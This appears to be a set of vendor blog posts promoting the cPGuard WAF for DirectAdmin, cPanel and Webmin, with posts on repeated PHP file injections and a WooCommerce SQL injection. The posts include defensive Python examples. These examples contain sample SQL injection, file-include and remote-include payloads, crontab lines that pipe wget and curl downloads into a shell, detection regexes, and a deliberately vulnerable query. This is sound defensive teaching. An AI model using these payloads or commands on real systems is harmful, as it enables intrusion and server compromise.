DirectAdmin ModSecurity Web Application Firewall – DirectAdmin WAF 

What is a Web Application Firewall (WAF)?

A web application firewall (WAF) is a security layer that runs alongside or in front of your web server and monitors and filters the incoming traffic to a web application. Its duty is to block malicious traffic and bots while allowing legitimate traffic through. With a proper WAF, you can eliminate most web security threats against your websites or web applications and avoid compromised websites on your server.

Importance of a Web Application Firewall in DirectAdmin

The actual duty of a WAF is to secure websites and web applications from web attacks and malicious access. On a DirectAdmin server, where people normally host multiple websites, a security layer like a WAF is essential because many types and versions of web applications and frameworks are installed on the same server. On many such servers, the installed web applications contain known or unknown vulnerabilities, which are the key for hackers to gain access to the website or the user account. With a proper web application firewall, we can stop most website vulnerability scanners, general web attack attempts, and website compromises, which eventually reduces server load and saves server admin time. It is easy to enable and manage cPGuard WAF on a DirectAdmin server, and we provide complete support for the integration and log management.

cPGuard WAF

The cPGuard WAF is powered by the Malware.Expert commercial ModSecurity rule set, tuned for shared hosting servers. It is written from scratch based on more than 10 years of real-world analysis of websites and can block most generic and targeted attacks. It blocks most generic attacks against the web server and PHP, broken out into the following attack categories:

  • SQL injection
  • Cross-site Scripting (XSS)
  • Local File Include
  • Remote File Include
  • File upload vulnerabilities
  • Zero-Day attacks
  • Web shell execution
  • Captcha verification

It also has optimized application-specific ModSecurity rules, covering the same vulnerability classes for applications such as:

  • WordPress
  • Joomla
  • Drupal, etc.

How can cPGuard WAF help to block web attacks and reduce server load?

The cPGuard WAF has several rule sets, which you can enable optionally based on your preference. Together, the rules can stop bad bot access, completely stop WordPress login page and xmlrpc.php attacks using the unique captcha system, and block generic attacks.

For example, you may not need to worry about SQL injection attacks after enabling cPGuard WAF. This is a major issue, especially for WordPress plugins, where such vulnerabilities are reported quite often (recent examples are CVE-2023-23488, CVE-2023-23489, and CVE-2023-23490). You can be worry-free: you do not need to follow each such report and force users to patch in order to avoid a compromised website.
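To make the "attack categories" concrete, here is an added, illustrative request inspector written for this article; it is not cPGuard's or Malware.Expert's rule set (those are commercial and not reproduced here). It applies one simple signature per category to constructed sample requests and reports the verdict a WAF log would record.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

# Constructed, deliberately small signatures modelled on the categories listed above.
# A production rule set (e.g. ModSecurity) has hundreds of rules per category.
RULES = [
    ("SQL injection", re.compile(r"\bunion\b.+\bselect\b|\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("Local File Include", re.compile(r"(\.\./){2,}|/etc/passwd", re.I)),
    ("Remote File Include", re.compile(r"[?&]\w+=(https?|ftp)://", re.I)),
    ("Web shell execution", re.compile(r"[?&](cmd|exec)=", re.I)),
]
BAD_BOT_UA = re.compile(r"sqlmap|nikto|masscan", re.I)


@dataclass
class Request:
    method: str
    uri: str
    user_agent: str = ""
    body: str = ""


def inspect(req):
    """Return the matched category, or None when the request looks legitimate."""
    if BAD_BOT_UA.search(req.user_agent):
        return "Bad bot"
    # Decode URL encoding first so that encoded payloads hit the same signatures.
    haystack = unquote_plus(req.uri) + "\n" + unquote_plus(req.body)
    for name, pattern in RULES:
        if pattern.search(haystack):
            return name
    return None


def filter_requests(requests):
    """Produce (uri, verdict) pairs, the shape of a WAF audit log line."""
    return [(r.uri, inspect(r) or "allow") for r in requests]


# Constructed sample traffic; the hostname is a reserved example domain.
SAMPLES = [
    Request("GET", "/?s=shoes"),
    Request("GET", "/product?id=1%20UNION%20SELECT%20user_pass%20FROM%20wp_users"),
    Request("GET", "/index.php?page=../../../../etc/passwd"),
    Request("GET", "/index.php?tpl=http://evil.example/shell.txt"),
    Request("POST", "/wp-login.php", user_agent="sqlmap/1.7", body="log=admin&pwd=x"),
]

if __name__ == "__main__":
    for uri, verdict in filter_requests(SAMPLES):
        print(f"{verdict:<22} {uri}")
```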

How to enable cPGuard WAF?

To install and enable cPGuard WAF, you need to purchase and install cPGuard first on your server. After installing cPGuard on your server, you may refer to this help article and enable WAF on your server. It is easy to enable or disable the WAF with a few clicks. You also have the flexibility to enable or disable selected WAF rule sets for specific types of attacks. You can view the WAF logs from the App Portal, and each user can view the web attacks against their websites from the user plugin available in DirectAdmin.

Conclusion

The cPGuard WAF is a cost-effective and efficient WAF and security plugin available now for your DirectAdmin server. It is compatible with all web servers supported in DirectAdmin and integrates seamlessly with them. cPGuard can automate malware scans, web attack mitigation, and distributed attack blocking, and helps to reduce server load and the total time spent managing servers. We offer a 30-day free trial, so you can try the solution without payment, and it remains the cheapest security suite after the trial period.

cPanel ModSecurity Web Application Firewall – cPanel WAF

What is a Web Application Firewall (WAF)?

A web application firewall (WAF) is a security layer that runs alongside or in front of your web server and monitors and filters the incoming traffic to a web application. Its duty is to block malicious traffic and bots while allowing legitimate traffic through. With a proper WAF, you can eliminate most web security threats against your websites or web applications and avoid compromised websites on your server.

Web Application Firewall for cPanel

As mentioned above, the actual duty of a WAF is to secure websites and web applications from web attacks and malicious access. On a cPanel server, where people normally host multiple websites, a security layer like a WAF is essential because many web applications and frameworks are installed on the same server. On such servers, the installed web applications may contain known or unknown vulnerabilities, which are the key for hackers to gain access to the website or the user account. With a proper web application firewall, we can stop most website vulnerability scanners, general web attack attempts, and website compromises, which eventually reduces server load and saves server admin time.

cPGuard WAF

The cPGuard WAF is powered by the Malware.Expert commercial ModSecurity rule set, tuned for shared hosting servers. It is written from scratch based on more than 10 years of real-world analysis of websites and can block most generic and targeted attacks. It blocks most generic attacks against the web server and PHP, broken out into the following attack categories:

  • SQL injection
  • Cross-site Scripting (XSS)
  • Local File Include
  • Remote File Include
  • File upload vulnerabilities
  • Zero-Day attacks
  • Web shell execution
  • Captcha verification

It also has optimized application-specific ModSecurity rules, covering the same vulnerability classes for applications such as:

  • WordPress
  • Joomla
  • Drupal, etc.

How can cPGuard WAF help to block web attacks and reduce server load?

The cPGuard WAF has several rule sets, which you can enable optionally based on your preference. Together, the rules can stop bad bot access, completely stop WordPress login page and xmlrpc.php attacks using the unique captcha system, and block generic attacks.

For example, you may not need to worry about SQL injection attacks after enabling cPGuard WAF. This is a major issue, especially for WordPress plugins, where such vulnerabilities are reported quite often (recent examples are CVE-2023-23488, CVE-2023-23489, and CVE-2023-23490). You can be worry-free: you do not need to follow each such report and force users to patch in order to avoid a compromised website.

How to enable cPGuard WAF?

To install and enable cPGuard WAF, you need to purchase and install cPGuard first on your server. After installing cPGuard on your server, you may refer to this help article and enable WAF on your server. It is easy to enable or disable the WAF with a few clicks. You can also view the WAF logs from the App Portal, and each user can view the web attacks against their websites from the user plugin available in cPanel.

Conclusion 

The cPGuard WAF is a cost-effective and efficient WAF and security plugin available now for your cPanel server. It can automate malware scans, web attack mitigation, and distributed attack blocking, and helps to reduce server load and the total time spent managing servers. We offer a 30-day free trial, so you can try the solution without payment, and it remains the cheapest security suite after the trial period.

Secure websites in Webmin/Virtualmin, Webmin antivirus/antimalware

Secure Webmin/Virtualmin Hosting

Nowadays it is very challenging to keep the websites on your server safe and secure. You can always expect attacks or attempts to compromise your websites, especially those running popular CMSs like WordPress. It is therefore laborious for every web host or server owner to stay up to date, defend against such attacks, and keep their websites safe.

How can cPGuard help you to secure websites on your Webmin/Virtualmin server?

All the modules in the cPGuard Security Suite work side by side to protect your websites from attacks. It secures your server in multiple layers, blocks intrusion attempts, reduces server load and overhead, and helps to drastically reduce the admin hours spent dealing with attacks and compromised websites. Given below are some of the cPGuard modules that protect your server.

  1. File Scanner – This module acts as an antivirus/antimalware for websites hosted in Webmin/Virtualmin. Integrated with its cleanup module, it helps to detect and wipe malicious file uploads and code injections in your websites.
  2. Web Application Firewall – cPGuard's ModSecurity web application firewall rules stop all generic web attacks against your websites before they even begin. The commercial WAF rules by Malware.Expert protect your Webmin/Virtualmin client websites by effectively blocking generic web attacks, application-specific web attacks, bot attacks, and more.
  3. Distributed system firewall – The IPDB distributed system firewall for Webmin/Virtualmin blocks traffic from known and active attack source IPs. It is very effective at blocking many attacks before they even reach your application server, which reduces your server overhead as well.
  4. Reputation monitoring – The reputation monitoring module keeps an eye on the status of your IP addresses and domains and alerts you if they are listed on blacklists.

There are many other functionalities integrated within cPGuard to help you run your server securely and cleanly. Please read the full feature list at https://opsshield.com/standalone.html

If you wish to secure your Webmin/Virtualmin server, please follow the installation instructions. Installation is pretty simple and we have pre-built templates to support Webmin/Virtualmin servers.

Sample steps for installing cPGuard on a Webmin/Virtualmin server are given below.

Repeated PHP File Injections

Injecting bad code into a legitimate file, or inserting a bad file into an application folder, is a very common type of malware attack. But there are some specific cases where file injection happens repeatedly to the same file or folder. In such cases, even if the scanner detects the instance and takes action against it, the injection happens again and floods the scanner log. In this blog, we discuss some common reasons behind such issues, based on the cases that we have handled in the past.

1. Cron Jobs

This is a very common cause of repeated file injections and is easy to find. In this scenario, the user account is compromised and the attacker takes advantage of it to install malicious cron jobs that repeatedly inject files into the account.

Given below is an active campaign specifically targeting cPanel accounts, in which cPanel accounts compromised through the campaign have been abused with similar cron jobs for the past couple of weeks.

There can be other types of cron jobs as well, which download a file from a remote location and execute it. The downloaded program then runs as a daemon on the server, monitoring the account and uploading or updating malicious code in it.

2. Process or daemon running under the user account

This type of abuse is also common and a bit more aggressive than the scheduled cron-based injections. As it is a running process, it actively tracks any change to the targeted infected file or location and re-adds the infection if it cannot find the bad code there. This type of abuse is easy to find because the bad process keeps running and consumes resources. You can easily track such jobs by listing the processes owned by the affected user with the "ps" command. A few such examples are given below.

cPGuard has an integrated process monitoring module, which periodically scans the processes running under user accounts and takes action on and reports any that match known abuse patterns.
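The two checks above (a user's crontab for "download and execute" entries, and the user's process list for daemons running from unusual locations) can be scripted. The following is an added example written for this article, not cPGuard's process monitoring module; the crontab and ps output are constructed samples using reserved TEST-NET addresses, and the heuristics are intentionally simple.

```python
import re

# Constructed sample of `crontab -l -u site1` output (not a real campaign capture).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/php /home/site1/public_html/wp-cron.php
*/5 * * * * wget -q -O- http://203.0.113.10/x.txt | sh
*/10 * * * * /bin/bash -c "curl -s http://198.51.100.7/u.sh | bash"
"""

# Constructed sample of `ps -u site1 -o pid=,etime=,args=` output.
SAMPLE_PS = """\
 2201    03:12:44 php-fpm: pool site1
 2377 12-04:01:19 /tmp/.x/kthreadd
 2390 12-04:01:10 perl /dev/shm/.s.pl
 2405    00:00:02 /usr/bin/php /home/site1/public_html/wp-cron.php
"""

DOWNLOADER = re.compile(r"\b(wget|curl)\b")
PIPED_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
# Executables under world-writable temp dirs, or any hidden path component.
SUSPICIOUS_PATH = re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/|/\.[^/\s]+")


def flag_cron_entries(crontab_text):
    """Return the command part of every cron entry that fetches and executes remote content."""
    flagged = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot cmd" has one schedule field; "m h dom mon dow cmd" has five.
        fields = line.split(None, 1 if line.startswith("@") else 5)
        command = fields[-1]
        if DOWNLOADER.search(command) and PIPED_TO_SHELL.search(command):
            flagged.append(command)
    return flagged


def flag_processes(ps_text):
    """Return (pid, args) for processes whose command line points at a suspicious path."""
    flagged = []
    for line in ps_text.splitlines():
        pid, _etime, args = line.split(None, 2)
        if SUSPICIOUS_PATH.search(args):
            flagged.append((int(pid), args))
    return flagged
```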

3. Using hidden code in nulled third-party modules

This is another method, and it is difficult to find because it requires source code verification of all files within the account. This often happens with nulled WordPress plugins and themes, which users install to save some money. But such packages cause more damage and can ultimately leave your website unusable and vulnerable. You need to go through each file, or use a malware scanner like cPGuard, to find such hidden malicious code. An example of such a case is given below; it runs every time the website is accessed and includes malicious code in the index.php file.

Conclusion

The causes of repeated file infection are not limited to these; it can happen for other reasons as well. But these are the most common reasons behind repeated infections, and cPGuard has already been trained to handle many such cases. Ultimately, though, you must find the security hole through which the attacker gained access to the account and patch it. Otherwise, the attacker can come back at any time and repeat the action.

SQL Injection Vulnerability Discovered in WooCommerce – Generic SQL Injection Attacks

On 15th July 2021, a critical SQL injection vulnerability in the WooCommerce e-commerce platform and a related plugin was reported, which might affect millions of websites around the world. The vulnerabilities were detected on the 13th of July and fixed in WooCommerce versions 3.3.6 to 5.5.1 and WooCommerce Blocks versions 2.5.16 to 5.5.1. Though WooCommerce pushed a forced automatic update to all affected websites, it is recommended to check your website manually and make sure that everything is up to date.

What is the exploit impact? As per the announcement from WooCommerce, this vulnerability allows an unauthenticated attacker to access arbitrary data in an online store's database. If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information.

So what is an SQL injection attack, and how can it be prevented? SQL injection is a web security vulnerability that allows an attacker to interfere with the SQL queries that an application makes to its database. It allows a malicious hacker to affect the database in a way that makes it disclose information or behave differently from how it is supposed to. This is a common attack vector and can mostly be detected using website auditing tools. The developer of every application must properly validate user input, whether it arrives through a form or from the URI, and filter it properly.
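The following is an added illustration written for this article (it is not WooCommerce code and does not reproduce the vulnerability above): a lookup that interpolates a URI parameter straight into SQL, next to the hardened form that validates the input and binds it as a query parameter, run against a constructed in-memory table.

```python
import sqlite3


def setup_db():
    """Constructed in-memory table standing in for a shop's order data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (id INTEGER, customer TEXT, email TEXT)")
    db.executemany("INSERT INTO orders VALUES (?, ?, ?)", [
        (1, "alice", "alice@example.com"),
        (2, "bob", "bob@example.com"),
    ])
    return db


def lookup_order_vulnerable(db, order_id):
    # The value from the request becomes part of the SQL text, so the database
    # treats whatever the client sent as code, not as data.
    sql = f"SELECT id, customer, email FROM orders WHERE id = {order_id}"
    return db.execute(sql).fetchall()


def lookup_order_safe(db, order_id):
    # Validate the type first, then bind the value as a parameter; a bound
    # parameter can never change the structure of the query.
    if not str(order_id).isdigit():
        raise ValueError("order id must be a positive integer")
    sql = "SELECT id, customer, email FROM orders WHERE id = ?"
    return db.execute(sql, (int(order_id),)).fetchall()


def compare(db, user_input):
    """Run both lookups on the same input.

    Returns (rows from the vulnerable lookup, rows from the safe lookup or
    None when the safe lookup rejected the input).
    """
    vulnerable_rows = lookup_order_vulnerable(db, user_input)
    try:
        safe_rows = lookup_order_safe(db, user_input)
    except ValueError:
        safe_rows = None
    return vulnerable_rows, safe_rows


if __name__ == "__main__":
    # A tautology in the "id" parameter makes the vulnerable query return every row.
    print(compare(setup_db(), "1 OR 1=1"))
```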

Can cPGuard protect your website from such vulnerabilities? Yes. The cPGuard WAF, powered by the Malware.Expert ModSecurity rule set, protects your websites from such generic attacks, including SQL injection. So cPGuard can already defend against such attacks and protect your websites. It also works together with the IPDB Distributed Firewall module, which detects and blocks repeatedly attacking IPs across all our customer servers.